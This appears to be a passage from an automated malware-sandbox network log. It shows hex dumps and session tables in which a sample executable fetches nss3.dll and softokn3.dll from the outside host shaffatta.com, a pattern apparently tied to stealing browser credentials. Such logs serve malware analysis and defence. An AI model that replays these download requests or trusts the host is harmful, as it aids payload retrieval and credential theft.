8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 Data Ascii: NQ/MSwQVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;
2024-05-03 00:08:38 UTC	16384	IN	Data Raw: 08 83 eb 08 89 45 e0 89 5d dc 85 c0 0f 89 4b fe ff ff 8b 75 d8 8b 55 e8 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 Data Ascii: E]KuUu;t:]jYMS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV33
2024-05-03 00:08:38 UTC	16384	IN	Data Raw: 00 10 e8 07 56 00 00 8b c6 e8 66 c5 01 00 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 Data Ascii: VfUQEVuF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(
2024-05-03 00:08:38 UTC	16384	IN	Data Raw: e8 88 45 d8 50 8d 4d d8 c6 45 fc 0c e8 b4 18 ff ff ff 75 98 8b cf 33 f6 e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 Data Ascii: EPMEu3s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49744	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:39 UTC	89	OUT	GET /d32e011d2eaa85a0/nss3.dll HTTP/1.1 Host: shaffatta.com Cache-Control: no-cache
2024-05-03 00:08:40 UTC	288	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:39 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: close Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT ETag: "1f3950-5e7ea271b0900" Accept-Ranges: bytes X-Served-By: shaffatta.com
2024-05-03 00:08:40 UTC	16096	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-05-03 00:08:40 UTC	16384	IN	Data Raw: 0f 8e 17 01 00 00 0f bf 41 18 69 d8 7b 14 00 00 89 da c1 fa 13 89 de c1 ee 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 Data Ascii: Ai{kd)i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fA
2024-05-03 00:08:40 UTC	16384	IN	Data Raw: 03 00 00 8b 44 24 04 8b 4c 24 08 8b 7c 81 10 0f b7 47 06 8d 4c 24 50 50 68 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 Data Ascii: D$L$\|GL$PPhRQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$
2024-05-03 00:08:40 UTC	16384	IN	Data Raw: 10 57 ff d1 83 c4 04 03 05 e4 10 1e 10 a3 e4 10 1e 10 3b 05 0c 11 1e 10 77 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db Data Ascii: W;w@@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8
2024-05-03 00:08:40 UTC	16384	IN	Data Raw: 06 8b 48 1c ff 15 00 40 1e 10 6a 02 56 ff d1 83 c4 08 85 c0 0f 85 42 fd ff ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 Data Ascii: H@jVBD$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1
2024-05-03 00:08:40 UTC	16384	IN	Data Raw: 31 ff 89 7c 24 24 89 7c 24 08 0f 57 c0 0f 29 44 24 10 89 7c 24 20 89 54 24 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 Data Ascii: 1\|$$\|$W)D$\|$ T$%D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$
2024-05-03 00:08:40 UTC	16384	IN	Data Raw: 01 cb 89 5c 24 0c 39 c3 7d 21 8b 5c 24 0c 8d 3c 5b c1 e7 04 83 c7 10 8b 46 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 Data Ascii: \$9}!\$<[Fd8C0;^h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$
2024-05-03 00:08:40 UTC	16384	IN	Data Raw: 01 00 00 eb 58 83 b9 28 01 00 00 00 0f 84 b5 00 00 00 80 79 57 00 74 2d e9 e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d Data Ascii: X(yWt-LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-
2024-05-03 00:08:40 UTC	16384	IN	Data Raw: 4c 24 40 8b 74 24 14 89 31 89 41 04 0f 95 c3 c1 e3 12 81 cb 04 00 01 00 89 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 Data Ascii: L$@t$1AY`P19F$WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1
2024-05-03 00:08:40 UTC	16384	IN	Data Raw: 24 28 ff d1 83 c4 18 83 f8 01 0f 84 b4 fe ff ff a9 fd ff ff ff 0f 85 e5 00 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 Data Ascii: $(4D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9t

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49745	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:41 UTC	93	OUT	GET /d32e011d2eaa85a0/softokn3.dll HTTP/1.1 Host: shaffatta.com Cache-Control: no-cache
2024-05-03 00:08:42 UTC	286	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:42 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: close Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT ETag: "3ef50-5e7ea271b0900" Accept-Ranges: bytes X-Served-By: shaffatta.com
2024-05-03 00:08:42 UTC	16098	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-05-03 00:08:42 UTC	16384	IN	Data Raw: e9 e8 38 8c 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c 8b 7d 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be Data Ascii: 8^_[]]}jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E
2024-05-03 00:08:42 UTC	16384	IN	Data Raw: c4 0c 8b 45 08 ff 70 0c ff 70 08 57 e8 2d 9e ff ff 83 c4 0c 8b 45 d4 8b 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 Data Ascii: EppW-E@EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@
2024-05-03 00:08:42 UTC	16384	IN	Data Raw: b6 41 01 d1 e8 8a 80 68 f9 02 10 88 41 01 0f b6 41 02 d1 e8 8a 80 68 f9 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 Data Ascii: AhAAhAAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q
2024-05-03 00:08:42 UTC	16384	IN	Data Raw: 24 8d 08 fc 02 10 81 7c 24 24 54 43 53 ce 0f 85 66 08 00 00 8b 43 04 85 c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f Data Ascii: $\|$$TCSfC0{C!=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!
2024-05-03 00:08:42 UTC	16384	IN	Data Raw: c4 04 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 2c 8c 01 00 89 f8 83 c4 10 5e 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 Data Ascii: 1M1,^_[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2P
2024-05-03 00:08:42 UTC	16384	IN	Data Raw: 00 85 c0 0f 84 14 02 00 00 50 e8 ef 58 00 00 83 c4 04 89 45 dc 85 c0 74 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff Data Ascii: PXEtwu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWS
